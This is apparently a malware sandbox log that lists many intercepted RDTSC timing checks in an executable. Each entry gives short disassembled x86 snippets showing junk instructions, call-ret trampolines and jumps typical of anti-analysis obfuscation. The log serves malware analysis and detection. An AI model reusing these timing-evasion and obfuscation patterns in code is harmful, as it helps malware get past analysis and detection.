Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A35D second address: E7A36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4BA0D3F156h 0x0000000a jnc 00007F4BA0D3F156h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A36E second address: E7A378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4BA0D39706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A4AA second address: E7A4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4BA0D3F156h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A632 second address: E7A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A638 second address: E7A653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D3F162h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A653 second address: E7A65D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A792 second address: E7A7A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A7A0 second address: E7A7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4BA0D3970Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A8E2 second address: E7A8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7AA92 second address: E7AA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7AA98 second address: E7AA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7ABD5 second address: E7ABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D39719h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7ABF7 second address: E7ABFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7ABFD second address: E7AC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F4BA0D3971Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7AD90 second address: E7ADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7DF48 second address: E7DF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7DF4E second address: E7DF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jns 00007F4BA0D3F156h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F4BA0D3F156h 0x0000001b jmp 00007F4BA0D3F15Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E14864 second address: E14868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E14868 second address: E14891 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F4BA0D3F15Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4BA0D3F163h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8342C second address: E83432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E83432 second address: E83453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F4BA0D3F156h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8202B second address: E8202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8202F second address: E82039 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E825DB second address: E825E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E825E1 second address: E825E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E82785 second address: E8278B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8278B second address: E82790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E82B91 second address: E82B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E82E80 second address: E82E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E362E6 second address: E36308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39719h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0733D second address: E07353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E07353 second address: E07363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4BA0D39706h 0x0000000a jc 00007F4BA0D39706h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E88C95 second address: E88CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F4BA0D3F156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F4BA0D3F15Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87AC6 second address: E87ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87ACA second address: E87AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87AD2 second address: E87AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87C39 second address: E87C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87C3F second address: E87C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87C43 second address: E87C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F162h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8810C second address: E88112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E88568 second address: E8856E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E889CA second address: E889F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39715h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F4BA0D3970Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E889F3 second address: E889F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E889F8 second address: E88A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E88A05 second address: E88A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E807 second address: E8E823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8D6CA second address: E8D6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F4BA0D3F15Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8D6EB second address: E8D6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E560E0 second address: E56114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 js 00007F4BA0D3F159h 0x0000000f movsx ecx, dx 0x00000012 lea eax, dword ptr [ebp+12481EB9h] 0x00000018 jnp 00007F4BA0D3F15Ch 0x0000001e mov dword ptr [ebp+1246F4C0h], edx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F4BA0D3F15Ah 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56114 second address: E56119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56119 second address: E56132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4BA0D3F156h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F158h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56132 second address: E56138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56138 second address: E5613C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5613C second address: E3576D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call dword ptr [ebp+122D1E3Bh] 0x0000000f jbe 00007F4BA0D3973Eh 0x00000015 jns 00007F4BA0D3972Eh 0x0000001b jne 00007F4BA0D3970Ah 0x00000021 jl 00007F4BA0D39748h 0x00000027 pushad 0x00000028 jmp 00007F4BA0D39719h 0x0000002d jbe 00007F4BA0D39706h 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 push edx 0x00000036 pop edx 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5678A second address: E56790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56790 second address: E56795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56795 second address: E567B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E567B3 second address: E567D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F4BA0D39713h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E567D8 second address: E567DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E567DC second address: E56867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007F4BA0D39718h 0x00000011 jbe 00007F4BA0D39712h 0x00000017 jmp 00007F4BA0D3970Ch 0x0000001c pop eax 0x0000001d or dword ptr [ebp+124553B2h], ebx 0x00000023 mov ecx, 3D0C8D29h 0x00000028 call 00007F4BA0D39709h 0x0000002d push eax 0x0000002e jnl 00007F4BA0D3970Ch 0x00000034 pop eax 0x00000035 push eax 0x00000036 jmp 00007F4BA0D39712h 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push ebx 0x00000040 jmp 00007F4BA0D39713h 0x00000045 pop ebx 0x00000046 mov eax, dword ptr [eax] 0x00000048 push eax 0x00000049 push edx 0x0000004a jnp 00007F4BA0D39715h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56867 second address: E5686D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56B5D second address: E56B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56B63 second address: E56B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E570CF second address: E570D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5746B second address: E57480 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F4BA0D3F156h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E57480 second address: E574E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F4BA0D39708h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 mov bh, ch 0x00000025 mov ah, ECh 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp+12481EFDh] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F4BA0D39708h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E574E6 second address: E574EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E574EB second address: E57587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4BA0D39715h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4BA0D39708h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+12481EB9h] 0x00000030 jmp 00007F4BA0D3970Ah 0x00000035 nop 0x00000036 pushad 0x00000037 jmp 00007F4BA0D39712h 0x0000003c pushad 0x0000003d jmp 00007F4BA0D39716h 0x00000042 jmp 00007F4BA0D39711h 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jo 00007F4BA0D39708h 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E57587 second address: E362E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007F4BA0D3F15Bh 0x00000028 call dword ptr [ebp+122D2947h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007F4BA0D3F15Ah 0x00000036 pop edi 0x00000037 jmp 00007F4BA0D3F169h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DAF0 second address: E8DAFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D39708h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DC62 second address: E8DC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F4BA0D3F156h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DDF4 second address: E8DDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DDF8 second address: E8DDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E0C0 second address: E8E0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39717h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E0DD second address: E8E0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F4BA0D3F156h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F4BA0D3F15Bh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E390 second address: E8E3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Fh 0x00000009 jmp 00007F4BA0D39717h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4BA0D39710h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E3CF second address: E8E3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E936D1 second address: E936E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F4BA0D39706h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0DEC8 second address: E0DEF9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 js 00007F4BA0D3F156h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0DEF9 second address: E0DEFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E93271 second address: E9329C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F4BA0D3F164h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E96057 second address: E9605B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9605B second address: E9605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B21A second address: E9B21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B21F second address: E9B227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
